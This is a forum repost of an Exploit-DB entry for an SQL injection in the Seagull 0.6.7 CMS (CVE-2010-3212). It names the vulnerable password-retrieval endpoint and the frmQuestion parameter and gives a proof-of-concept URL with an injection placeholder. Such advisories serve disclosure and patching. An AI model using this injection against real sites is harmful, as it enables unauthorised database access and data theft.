Exploit Seagull 0.6.7 - SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
14838
Проверка EDB
  1. Пройдено
Автор
SWEET
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2010-3212
Дата публикации
2010-08-29
Код:
1                    ######################################            1
0                       Sweet the Algerian Haxxor                      0
1                    ######################################            0
0                                                                      1
1  [+]Exploit Title:    seagull-0.6.7 SQLinjection Vulnerabilitie      0
0  [+]Date: 29/08/2010                                                 1
1  [+]Author: Sweet                                                    0
0  [+]Contact : [email protected]                                    0
1  [+]Software Link: http://seagullproject.org/                        0
0  [+]Download:                                                        1
1  [+]Version: 0.6.7 and lesser                                        0
0  [+]Tested on: WinXp sp3                                             1
1  [+]Risk : Hight                                                     0
0  [+]Description : just another CMS                                   0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


SQL injection : 

in /seagnulPath/www/index.php/user/password with http request editor The POST variable frmQuestion has been set to 1' 

POC:

http://server/index.php/user/password/?action=retrieve&[email protected]&frmQuestion=1'[SQLI]&[email protected]&submitted=retrieve  


screen shot:http://img163.imageshack.us/img163/3028/imagexp.jpg



thx to Milw0rm.com , JF - Hamst0r - Keystroke  , inj3ct0r.com , exploit-db.com


Saha Ftourkoum et 1,2,3 viva L'Algerie :))
 
Источник
www.exploit-db.com

Похожие темы